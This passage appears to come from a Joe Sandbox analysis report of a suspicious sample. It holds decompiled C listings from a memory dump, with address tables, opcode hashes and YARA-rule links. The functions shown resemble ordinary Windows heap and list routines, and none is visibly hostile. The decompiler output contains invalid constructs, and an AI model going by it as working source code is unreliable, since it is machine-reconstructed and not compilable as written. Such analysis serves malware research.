                                                                                                                              0x1d805d8d
                                                                                                                              0x1d805d94
                                                                                                                              0x1d805d95
                                                                                                                              0x1d805d99
                                                                                                                              0x1d805d9a
                                                                                                                              0x1d805d9c
                                                                                                                              0x1d805da1
                                                                                                                              0x1d805da7
                                                                                                                              0x1d805dab
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d805db7
                                                                                                                              0x1d805db9
                                                                                                                              0x1d805dbd
                                                                                                                              0x1d805dc2
                                                                                                                              0x1d805dc5
                                                                                                                              0x1d805dca
                                                                                                                              0x1d805de5
                                                                                                                              0x1d805de5
                                                                                                                              0x1d805de5
                                                                                                                              0x1d805dee
                                                                                                                              0x1d805df2
                                                                                                                              0x1d805df4
                                                                                                                              0x1d805df7
                                                                                                                              0x1d805dfb
                                                                                                                              0x1d805e00
                                                                                                                              0x1d805e00
                                                                                                                              0x1d805e03
                                                                                                                              0x1d805e03
                                                                                                                              0x1d805e05
                                                                                                                              0x1d805e0b
                                                                                                                              0x1d805e0d
                                                                                                                              0x1d805e0f
                                                                                                                              0x1d805e10
                                                                                                                              0x1d805e11
                                                                                                                              0x1d805e17
                                                                                                                              0x00000000
                                                                                                                              0x1d805e17
                                                                                                                              0x1d805dcc
                                                                                                                              0x1d805dce
                                                                                                                              0x1d805dd1
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d805dd8
                                                                                                                              0x1d805ddc
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d805dde
                                                                                                                              0x1d805de0
                                                                                                                              0x1d805de0
                                                                                                                              0x1d805de1
                                                                                                                              0x00000000
                                                                                                                              0x1d805e19
                                                                                                                              0x1d805e19
                                                                                                                              0x1d805e31
                                                                                                                              0x1d805e36
                                                                                                                              0x1d805e46
                                                                                                                              0x1d805e46
                                                                                                                              0x1d805d80
                                                                                                                              0x00000000

                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000007.00000002.42268320726.000000001D710000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D710000, based on PE: true
                                                                                                                              • Associated: 00000007.00000002.42269843013.000000001D839000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000007.00000002.42269890824.000000001D83D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_7_2_1d710000_aSsc9zh1ex.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 6d1e78583494c3bc86a1a10dc2c8977807bb679a9cc7766eb7de8456831c5c8c
                                                                                                                              • Instruction ID: b78e0c013a230e03ad8ad6f7ab75e281d33c4c4c0027408e0e90fd77a749d5ea
                                                                                                                              • Opcode Fuzzy Hash: 6d1e78583494c3bc86a1a10dc2c8977807bb679a9cc7766eb7de8456831c5c8c
                                                                                                                              • Instruction Fuzzy Hash: 4B31CE75A00256ABCB15DF58CC84BAEB7B5EB48B40F0145A9F904EB254D7B0FD40CBA1
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 1D767882 Relevance: .1, Instructions: 97COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 96%
                                                                                                                              			E1D767882(char __ecx, signed char* __edx, signed int _a4, intOrPtr _a8, signed int _a12, char _a16, intOrPtr _a20, signed int _a24, intOrPtr _a28, intOrPtr _a32, char _a36, intOrPtr _a40, intOrPtr _a44, intOrPtr _a48, intOrPtr* _a52, char* _a56, signed int* _a60) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				signed char* _v20;
				char _v24;
				intOrPtr _t37;
				intOrPtr* _t39;
				intOrPtr _t42;
				char _t53;
				intOrPtr _t56;
				intOrPtr _t62;
				intOrPtr* _t63;

				_t62 =  *((intOrPtr*)( *[fs:0x30] + 0x18));
				_v20 = __edx;
				_v24 = __ecx;
				if(_a4 == 0 && __ecx == 0) {
					 *_a56 = 0;
					asm("sbb ecx, ecx");
					 *_a60 =  ~(_a12 & 0x000000ff) & 0x00000400;
					 *_a52 = 0;
					return 0x8000000b;
				}
				_t63 = _a52;
				_t53 = 0xc8;
				_v8 = 0xc8;
				_v12 = 0;
				while(1) {
					_t37 =  *0x1d835d78; // 0x0
					_t39 = E1D755D90(_t53, _t62, _t37 + 0x140000, _t53);
					 *_t63 = _t39;
					if(_t39 == 0) {
						break;
					}
					_t42 = E1D767977(_v24, _v20, _a4, _a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48,  &_v8, _t39, _a56, _a60);
					_v16 = _t42;
					if(_t42 >= 0) {
						if(_v8 == 0) {
							E1D753BC0(_t62, 0,  *_t63);
							 *_t63 = 0;
							return _v16;
						}
					} else {
						E1D753BC0(_t62, 0,  *_t63);
						_t42 = _v16;
						 *_t63 = 0;
						if(_t42 == 0xc0000023) {
							_t56 = _v12 + 1;
							_v12 = _t56;
							if(_t56 < 2) {
								_t53 = _v8;
								continue;
							}
						}
					}
					return _t42;
				}
				return 0xc0000017;
			}















                                                                                                                              0x1d767897
                                                                                                                              0x1d76789a
                                                                                                                              0x1d76789d
                                                                                                                              0x1d7678a0
                                                                                                                              0x1d767948
                                                                                                                              0x1d76794a
                                                                                                                              0x1d767955
                                                                                                                              0x1d76795a
                                                                                                                              0x00000000
                                                                                                                              0x1d76795c
                                                                                                                              0x1d7678aa
                                                                                                                              0x1d7678ad
                                                                                                                              0x1d7678b4
                                                                                                                              0x1d7678b7
                                                                                                                              0x1d7678ba
                                                                                                                              0x1d7678ba
                                                                                                                              0x1d7678c7
                                                                                                                              0x1d7678cc
                                                                                                                              0x1d7678d0
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d76790b
                                                                                                                              0x1d767910
                                                                                                                              0x1d767915
                                                                                                                              0x1d767936
                                                                                                                              0x1d7ac9a9
                                                                                                                              0x1d7ac9b1
                                                                                                                              0x00000000
                                                                                                                              0x1d7ac9b1
                                                                                                                              0x1d767917
                                                                                                                              0x1d76791b
                                                                                                                              0x1d767920
                                                                                                                              0x1d767923
                                                                                                                              0x1d76792a
                                                                                                                              0x1d767966
                                                                                                                              0x1d767967
                                                                                                                              0x1d76796d
                                                                                                                              0x1d76796f
                                                                                                                              0x00000000
                                                                                                                              0x1d76796f
                                                                                                                              0x1d76796d
                                                                                                                              0x1d76792a
                                                                                                                              0x1d767930
                                                                                                                              0x1d767930
                                                                                                                              0x00000000

                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000007.00000002.42268320726.000000001D710000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D710000, based on PE: true
                                                                                                                              • Associated: 00000007.00000002.42269843013.000000001D839000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000007.00000002.42269890824.000000001D83D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_7_2_1d710000_aSsc9zh1ex.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 759510f8f56393bf4c1ebe48b0349fd7c65ae1c99ee08d5f40558739202c5ec9
                                                                                                                              • Instruction ID: b7487e1e43b01cb6de8cb01456fa01089a088e08ab9f09f35f0c3847aa5709e1
                                                                                                                              • Opcode Fuzzy Hash: 759510f8f56393bf4c1ebe48b0349fd7c65ae1c99ee08d5f40558739202c5ec9
                                                                                                                              • Instruction Fuzzy Hash: 45317875500249FFEF068F98D8909AEBBB5FF093A0F11406AFE55A7220E330D950DB62
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 1D805C38 Relevance: .1, Instructions: 95COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 85%
                                                                                                                              			E1D805C38(signed int __ecx, intOrPtr* __edx) {
				char _v8;
				char _v12;
				intOrPtr _v16;
				intOrPtr* _v20;
				intOrPtr _t29;
				intOrPtr* _t30;
				signed int* _t40;
				void* _t44;
				signed int _t50;
				intOrPtr* _t51;
				intOrPtr _t52;

				_v20 = __edx;
				_t50 = __ecx;
				if(__edx != 0) {
					L1D752330(__edx, 0x1d83433c);
					_t42 = _t50;
					_t40 = E1D805C15(_t50);
					if(_t40 != 0) {
						L15:
						E1D7524D0(0x1d83433c);
						 *_v20 = _t40;
						return 0;
					}
					_t44 = E1D805C15(_t42 ^ 0x00000100);
					if(_t44 != 0) {
						_v12 =  *((intOrPtr*)(_t44 + 4));
						_v8 =  *((intOrPtr*)(_t44 + 8));
						L7:
						_t51 = E1D755D90(_t44,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0x50);
						if(_t51 != 0) {
							_t10 = _t51 + 0xc; // 0xc
							_t40 = _t10;
							_t29 = E1D7F7D67(_t50, _v12, _v8, _t40);
							_v16 = _t29;
							if(_t29 >= 0) {
								 *(_t51 + 8) = _t50;
								_t30 =  *0x1d83341c; // 0x774b3418
								if( *_t30 != 0x1d833418) {
									0x1d833418 = 3;
									asm("int 0x29");
								}
								 *_t51 = 0x1d833418;
								 *((intOrPtr*)(_t51 + 4)) = _t30;
								 *_t30 = _t51;
								 *0x1d83341c = _t51;
								goto L15;
							}
							E1D753BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t51);
							_t52 = _v16;
							L11:
							E1D7524D0(0x1d83433c);
							return _t52;
						}
						_t52 = 0xc0000017;
						goto L11;
					}
					_push( &_v8);
					_push( &_v12);
					_push(_t44);
					_push(_t50 & 0xfffffeff);
					_push(0xc);
					_t52 = E1D783940();
					if(_t52 >= 0) {
						goto L7;
					}
					goto L11;
				}
				return 0xc00000f0;
			}














                                                                                                                              0x1d805c43
                                                                                                                              0x1d805c48
                                                                                                                              0x1d805c4c
                                                                                                                              0x1d805c5d
                                                                                                                              0x1d805c62
                                                                                                                              0x1d805c69
                                                                                                                              0x1d805c6d
                                                                                                                              0x1d805d2d
                                                                                                                              0x1d805d32
                                                                                                                              0x1d805d3a
                                                                                                                              0x00000000
                                                                                                                              0x1d805d3c
                                                                                                                              0x1d805c7e
                                                                                                                              0x1d805c82
                                                                                                                              0x1d805ca7
                                                                                                                              0x1d805cad
                                                                                                                              0x1d805cb0
                                                                                                                              0x1d805cc2
                                                                                                                              0x1d805cc6
                                                                                                                              0x1d805cd2
                                                                                                                              0x1d805cd2
                                                                                                                              0x1d805cdb
                                                                                                                              0x1d805ce0
                                                                                                                              0x1d805ce5
                                                                                                                              0x1d805d0a
                                                                                                                              0x1d805d12
                                                                                                                              0x1d805d19
                                                                                                                              0x1d805d1d
                                                                                                                              0x1d805d1e
                                                                                                                              0x1d805d1e
                                                                                                                              0x1d805d20
                                                                                                                              0x1d805d22
                                                                                                                              0x1d805d25
                                                                                                                              0x1d805d27
                                                                                                                              0x00000000
                                                                                                                              0x1d805d27
                                                                                                                              0x1d805cf4
                                                                                                                              0x1d805cf9
                                                                                                                              0x1d805cfc
                                                                                                                              0x1d805d01
                                                                                                                              0x00000000
                                                                                                                              0x1d805d06
                                                                                                                              0x1d805cc8
                                                                                                                              0x00000000
                                                                                                                              0x1d805cc8
                                                                                                                              0x1d805c87
                                                                                                                              0x1d805c8b
                                                                                                                              0x1d805c8c
                                                                                                                              0x1d805c94
                                                                                                                              0x1d805c95
                                                                                                                              0x1d805c9c
                                                                                                                              0x1d805ca0
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d805ca2
                                                                                                                              0x00000000

                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000007.00000002.42268320726.000000001D710000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D710000, based on PE: true
                                                                                                                              • Associated: 00000007.00000002.42269843013.000000001D839000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000007.00000002.42269890824.000000001D83D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_7_2_1d710000_aSsc9zh1ex.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 0cb42eba702bbd8f9fedbf546e314451ae754dffe58dd348ad325a1a718f2164
                                                                                                                              • Instruction ID: 1e6d54e9d935fb4d867cdf4209b4d150bbea7d70ef618f46b24d5f6230c1a806
                                                                                                                              • Opcode Fuzzy Hash: 0cb42eba702bbd8f9fedbf546e314451ae754dffe58dd348ad325a1a718f2164
                                                                                                                              • Instruction Fuzzy Hash: 1E31D475A04649FBD7128F98CC94B6EB7A9AF44724F0140BAF509DB350D630FD018BB2
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 1D77188E Relevance: .1, Instructions: 95COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 92%
                                                                                                                              			E1D77188E(intOrPtr* __ecx, char* __edx) {
				unsigned int _v8;
				intOrPtr* _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t16;
				intOrPtr _t17;
				intOrPtr _t28;
				char* _t33;
				intOrPtr _t37;
				intOrPtr _t38;
				void* _t50;
				intOrPtr _t52;

				_push(__ecx);
				_push(__ecx);
				_t52 =  *0x1d835c90; // 0x11
				_t33 = __edx;
				_t48 = __ecx;
				_v12 = __ecx;
				if(_t52 == 0) {
					 *0x1d835c90 = 8;
					 *0x1d835c94 = 0x1d835c88;
					 *0x1d835c98 = 1;
					L6:
					_t2 = _t52 + 1; // 0x12
					E1D771B10(0x1d835c90, _t2, 7);
					asm("bts ecx, eax");
					 *_t48 = _t52;
					 *_t33 = 1;
					L3:
					_t16 = 0;
					L4:
					return _t16;
				}
				_t17 = E1D7719C0(__edx, __ecx, __ecx, _t52, 0x1d835c90, 1, 0);
				if(_t17 == 0xffffffff) {
					_t37 =  *0x1d835c90; // 0x11
					_t3 = _t37 + 0x27; // 0x38
					__eflags = _t3 >> 5 -  *0x1d835c98; // 0x1
					if(__eflags > 0) {
						_t38 =  *0x1d835d78; // 0x0
						_t4 = _t52 + 0x27; // 0x38
						_v8 = _t4 >> 5;
						_t50 = E1D755D90(_t38 + 0xc0000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t38 + 0xc0000, _t4 >> 5 << 2);
						__eflags = _t50;
						if(_t50 == 0) {
							_t16 = 0xc0000017;
							goto L4;
						}
						 *0x1d835c98 = _v8;
						_t8 = _t52 + 7; // 0x18
						E1D7888C0(_t50,  *0x1d835c94, _t8 >> 3);
						_t28 =  *0x1d835c94; // 0x774b5c88
						__eflags = _t28 - 0x1d835c88;
						if(_t28 != 0x1d835c88) {
							E1D753BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28);
						}
						_t9 = _t52 + 8; // 0x19
						 *0x1d835c94 = _t50;
						_t48 = _v12;
						 *0x1d835c90 = _t9;
						goto L6;
					}
					 *0x1d835c90 = _t37 + 8;
					goto L6;
				}
				 *__ecx = _t17;
				 *_t33 = 0;
				goto L3;
			}
















                                                                                                                              0x1d771893
                                                                                                                              0x1d771894
                                                                                                                              0x1d771897
                                                                                                                              0x1d77189d
                                                                                                                              0x1d7718a0
                                                                                                                              0x1d7718a2
                                                                                                                              0x1d7718a7
                                                                                                                              0x1d7718c8
                                                                                                                              0x1d7718d2
                                                                                                                              0x1d7718dc
                                                                                                                              0x1d7718e6
                                                                                                                              0x1d7718e8
                                                                                                                              0x1d7718f1
                                                                                                                              0x1d771909
                                                                                                                              0x1d77190e
                                                                                                                              0x1d771910
                                                                                                                              0x1d7718c1
                                                                                                                              0x1d7718c1
                                                                                                                              0x1d7718c3
                                                                                                                              0x1d7718c7
                                                                                                                              0x1d7718c7
                                                                                                                              0x1d7718b2
                                                                                                                              0x1d7718ba
                                                                                                                              0x1d771915
                                                                                                                              0x1d77191b
                                                                                                                              0x1d771921
                                                                                                                              0x1d771927
                                                                                                                              0x1d771934
                                                                                                                              0x1d77193a
                                                                                                                              0x1d771948
                                                                                                                              0x1d77195e
                                                                                                                              0x1d771960
                                                                                                                              0x1d771962
                                                                                                                              0x1d7b1a15
                                                                                                                              0x00000000
                                                                                                                              0x1d7b1a15
                                                                                                                              0x1d77196b
                                                                                                                              0x1d771970
                                                                                                                              0x1d77197e
                                                                                                                              0x1d771983
                                                                                                                              0x1d77198b
                                                                                                                              0x1d771990
                                                                                                                              0x1d7719b4
                                                                                                                              0x1d7719b4
                                                                                                                              0x1d771992
                                                                                                                              0x1d771995
                                                                                                                              0x1d77199b
                                                                                                                              0x1d77199e
                                                                                                                              0x00000000
                                                                                                                              0x1d77199e
                                                                                                                              0x1d77192c
                                                                                                                              0x00000000
                                                                                                                              0x1d77192c
                                                                                                                              0x1d7718bc
                                                                                                                              0x1d7718be
                                                                                                                              0x00000000

                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000007.00000002.42268320726.000000001D710000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D710000, based on PE: true
                                                                                                                              • Associated: 00000007.00000002.42269843013.000000001D839000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000007.00000002.42269890824.000000001D83D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_7_2_1d710000_aSsc9zh1ex.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 17767b7568188b607e478940a963af82ce20cc817f62ebff2fa7ef51940467c8
                                                                                                                              • Instruction ID: b26fa0a3892c9158f14cc692e2d98a6f05f580b004e76ef89c7673a9b728182a
                                                                                                                              • Opcode Fuzzy Hash: 17767b7568188b607e478940a963af82ce20cc817f62ebff2fa7ef51940467c8
                                                                                                                              • Instruction Fuzzy Hash: CA318975504220FBD7118F1CD8C4BA977B6FB897A8F114A9AE508DB251DA70F802CB62
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 1D77BC6E Relevance: .1, Instructions: 92COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 96%
                                                                                                                              			E1D77BC6E(signed short* __ecx) {
				signed int _v8;
				intOrPtr _v12;
				signed short _v16;
				intOrPtr _v20;
				signed short _v24;
				intOrPtr _v28;
				char _v32;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t25;
				signed short _t38;
				signed short* _t42;
				signed int _t44;
				signed short* _t52;
				signed short _t53;
				signed int _t54;

				_v8 =  *0x1d83b370 ^ _t54;
				_t42 = __ecx;
				_t44 =  *__ecx & 0x0000ffff;
				_t52 =  &(__ecx[2]);
				_t51 = _t44 + 2;
				if(_t44 + 2 > (__ecx[1] & 0x0000ffff)) {
					L4:
					_t25 =  *0x1d835d78; // 0x0
					_t53 = E1D755D90(_t44,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t25 + 0x180000, _t51);
					__eflags = _t53;
					if(_t53 == 0) {
						L3:
						return E1D784B50(_t28, _t42, _v8 ^ _t54, _t51, _t52, _t53);
					} else {
						E1D7888C0(_t53,  *_t52,  *_t42 & 0x0000ffff);
						 *((short*)(_t53 + (( *_t42 & 0x0000ffff) >> 1) * 2)) = 0;
						L2:
						_t51 = 4;
						if(E1D761C7D(_t53, _t51, _t58) != 0) {
							_t28 = E1D73E0E0(0x1d721298, 0, 0,  &_v32);
							__eflags = _t28;
							if(_t28 == 0) {
								_t38 = ( *_t42 & 0x0000ffff) + 2;
								__eflags = _t38;
								_v24 = _t53;
								_v16 = _t38;
								_v20 = 0;
								_v12 = 0;
								E1D771280(_t42, _v32, _v28, 0x1d721238, 1,  &_v24);
								_t28 = E1D7699E0(_v32, _v28);
							}
							__eflags = _t53 -  *_t52;
							if(_t53 !=  *_t52) {
								_t28 = E1D753BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t53);
							}
						}
						goto L3;
					}
				}
				_t53 =  *_t52;
				_t44 = _t44 >> 1;
				_t58 =  *((intOrPtr*)(_t53 + _t44 * 2));
				if( *((intOrPtr*)(_t53 + _t44 * 2)) != 0) {
					goto L4;
				}
				goto L2;
			}




















                                                                                                                              0x1d77bc7d
                                                                                                                              0x1d77bc81
                                                                                                                              0x1d77bc85
                                                                                                                              0x1d77bc88
                                                                                                                              0x1d77bc8f
                                                                                                                              0x1d77bc94
                                                                                                                              0x1d7b786f
                                                                                                                              0x1d7b786f
                                                                                                                              0x1d7b7889
                                                                                                                              0x1d7b788b
                                                                                                                              0x1d7b788d
                                                                                                                              0x1d77bcbc
                                                                                                                              0x1d77bcca
                                                                                                                              0x1d7b7893
                                                                                                                              0x1d7b789a
                                                                                                                              0x1d7b78a9
                                                                                                                              0x1d77bcaa
                                                                                                                              0x1d77bcac
                                                                                                                              0x1d77bcb6
                                                                                                                              0x1d7b78bf
                                                                                                                              0x1d7b78c4
                                                                                                                              0x1d7b78c6
                                                                                                                              0x1d7b78cd
                                                                                                                              0x1d7b78cd
                                                                                                                              0x1d7b78d0
                                                                                                                              0x1d7b78d3
                                                                                                                              0x1d7b78e4
                                                                                                                              0x1d7b78ea
                                                                                                                              0x1d7b78ed
                                                                                                                              0x1d7b78f8
                                                                                                                              0x1d7b78f8
                                                                                                                              0x1d7b78fd
                                                                                                                              0x1d7b78ff
                                                                                                                              0x1d7b7912
                                                                                                                              0x1d7b7912
                                                                                                                              0x1d7b78ff
                                                                                                                              0x00000000
                                                                                                                              0x1d77bcb6
                                                                                                                              0x1d7b788d
                                                                                                                              0x1d77bc9a
                                                                                                                              0x1d77bc9e
                                                                                                                              0x1d77bca0
                                                                                                                              0x1d77bca4
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000

                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000007.00000002.42268320726.000000001D710000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D710000, based on PE: true
                                                                                                                              • Associated: 00000007.00000002.42269843013.000000001D839000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000007.00000002.42269890824.000000001D83D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_7_2_1d710000_aSsc9zh1ex.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 0f9a2d9cafa4b73505fb705fcdc67f4963d64f354dd29f35dd0d4db19c1a45d2
                                                                                                                              • Instruction ID: bb530911b71a6420bd8c6289efb1cb4f15866e84da8ccf9b41962f186ff999d0
                                                                                                                              • Opcode Fuzzy Hash: 0f9a2d9cafa4b73505fb705fcdc67f4963d64f354dd29f35dd0d4db19c1a45d2
                                                                                                                              • Instruction Fuzzy Hash: BC31F571A00629EADF019F64DC85ABFB7B9FF44720F05446AFA01EB250E774E911C7A2
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 1D73DDB0 Relevance: .1, Instructions: 91COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 93%
                                                                                                                              			E1D73DDB0(intOrPtr* __ecx, void* __edx) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char* _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				signed int* _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				signed int* _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				char* _v76;
				intOrPtr _v80;
				signed int _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				signed int* _v108;
				char _v140;
				signed int _v144;
				signed int _v148;
				intOrPtr _v152;
				char _v156;
				intOrPtr _v160;
				char _v164;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t67;
				intOrPtr _t70;
				intOrPtr* _t71;
				void* _t72;
				signed int _t73;

				_t69 = __edx;
				_v8 =  *0x1d83b370 ^ _t73;
				_t48 =  *[fs:0x30];
				_t72 = __edx;
				_t71 = __ecx;
				if( *((intOrPtr*)( *[fs:0x30] + 0x18)) != 0) {
					_t48 = E1D740FB0(__ecx, __edx, 0x1d83666c, 0x1d73dd30, 0, 0);
					if( *0x1d8332f0 > 5 && E1D73DE1A(0x1d8332f0, 0, 0x2000) != 0) {
						_v104 = 0;
						_v108 =  &_v84;
						_v92 =  *((intOrPtr*)(__ecx + 0x28));
						_v84 =  *(__ecx + 0x24) & 0x0000ffff;
						_v156 =  *((intOrPtr*)(__ecx + 0x44));
						_v76 =  &_v156;
						_v144 =  *(_t72 + 0x44) & 0x0000ffff;
						_v60 =  &_v144;
						_t70 = 8;
						_v148 =  *(_t72 + 0x46) & 0x0000ffff;
						_v44 =  &_v148;
						_t67 = 4;
						_v164 =  *((intOrPtr*)(_t72 + 0x58));
						_v28 =  &_v164;
						_v68 = _t70;
						_v52 = 0x1d8332f0;
						_v36 = 0x1d8332f0;
						_v20 = _t70;
						_t69 = 0x1d720d5a;
						_v100 = 2;
						_v96 = 0;
						_v88 = 0;
						_v80 = 0;
						_v152 = 0;
						_v72 = 0;
						_v64 = 0;
						_v56 = 0;
						_v48 = 0;
						_v40 = 0;
						_v32 = 0;
						_v160 = 0;
						_v24 = 0;
						_v16 = 0;
						_t48 = E1D7C105C(0x1d8332f0, 0x1d720d5a, _t67, 0x1d8332f0, _t70,  &_v140);
					}
				}
				return E1D784B50(_t48, 0, _v8 ^ _t73, _t69, _t71, _t72);
			}











































                                                                                                                              0x1d73ddb0
                                                                                                                              0x1d73ddc2
                                                                                                                              0x1d73ddc5
                                                                                                                              0x1d73ddcf
                                                                                                                              0x1d73ddd2
                                                                                                                              0x1d73ddd7
                                                                                                                              0x1d73dde5
                                                                                                                              0x1d73ddf1
                                                                                                                              0x1d79d5b7
                                                                                                                              0x1d79d5ba
                                                                                                                              0x1d79d5c0
                                                                                                                              0x1d79d5c7
                                                                                                                              0x1d79d5cd
                                                                                                                              0x1d79d5d9
                                                                                                                              0x1d79d5e0
                                                                                                                              0x1d79d5ec
                                                                                                                              0x1d79d5f5
                                                                                                                              0x1d79d5f6
                                                                                                                              0x1d79d602
                                                                                                                              0x1d79d60a
                                                                                                                              0x1d79d60b
                                                                                                                              0x1d79d617
                                                                                                                              0x1d79d623
                                                                                                                              0x1d79d626
                                                                                                                              0x1d79d629
                                                                                                                              0x1d79d62c
                                                                                                                              0x1d79d62f
                                                                                                                              0x1d79d63a
                                                                                                                              0x1d79d641
                                                                                                                              0x1d79d644
                                                                                                                              0x1d79d647
                                                                                                                              0x1d79d64a
                                                                                                                              0x1d79d650
                                                                                                                              0x1d79d653
                                                                                                                              0x1d79d656
                                                                                                                              0x1d79d659
                                                                                                                              0x1d79d65c
                                                                                                                              0x1d79d65f
                                                                                                                              0x1d79d662
                                                                                                                              0x1d79d668
                                                                                                                              0x1d79d66b
                                                                                                                              0x1d79d66e
                                                                                                                              0x1d79d66e
                                                                                                                              0x1d73ddf1
                                                                                                                              0x1d73de19

                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000007.00000002.42268320726.000000001D710000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D710000, based on PE: true
                                                                                                                              • Associated: 00000007.00000002.42269843013.000000001D839000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000007.00000002.42269890824.000000001D83D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_7_2_1d710000_aSsc9zh1ex.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 88d9ac36a2a2afc2b7a0ae9c3dcfe9600a2ea498384c8a080e22e7d8b0b5a4ab
                                                                                                                              • Instruction ID: 6f18becb5fd68cdc9b88779e6234e771c17ffdf4d58229a5b8bf0d16109a6774
                                                                                                                              • Opcode Fuzzy Hash: 88d9ac36a2a2afc2b7a0ae9c3dcfe9600a2ea498384c8a080e22e7d8b0b5a4ab
                                                                                                                              • Instruction Fuzzy Hash: 4B41B5B5D00228EEDB20CF9AD981AEDFBF4BB48315F50816EE509E7241D7749A44CF51
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 1D8117BC Relevance: .1, Instructions: 91COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 100%
                                                                                                                              			E1D8117BC(intOrPtr __ecx, signed int __edx, intOrPtr _a4, intOrPtr _a8) {
				signed short _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				signed int _t55;
				void* _t61;
				signed short _t71;
				intOrPtr _t77;
				short _t79;
				signed short _t81;
				intOrPtr _t82;
				signed int _t85;
				signed short _t88;
				void* _t89;
				intOrPtr _t91;
				intOrPtr _t93;
				signed int _t95;
				signed short _t96;

				_t80 = __ecx;
				_t77 = _a4;
				_t88 = 0;
				_t55 = (__edx & 0x0000ffff) << 2;
				_t95 = _t55;
				_v20 = __ecx;
				_v16 = _t55;
				if(_a8 > 0) {
					do {
						_t95 = _t95 +  *(_t88 + _t77 + 0x2c) * 2;
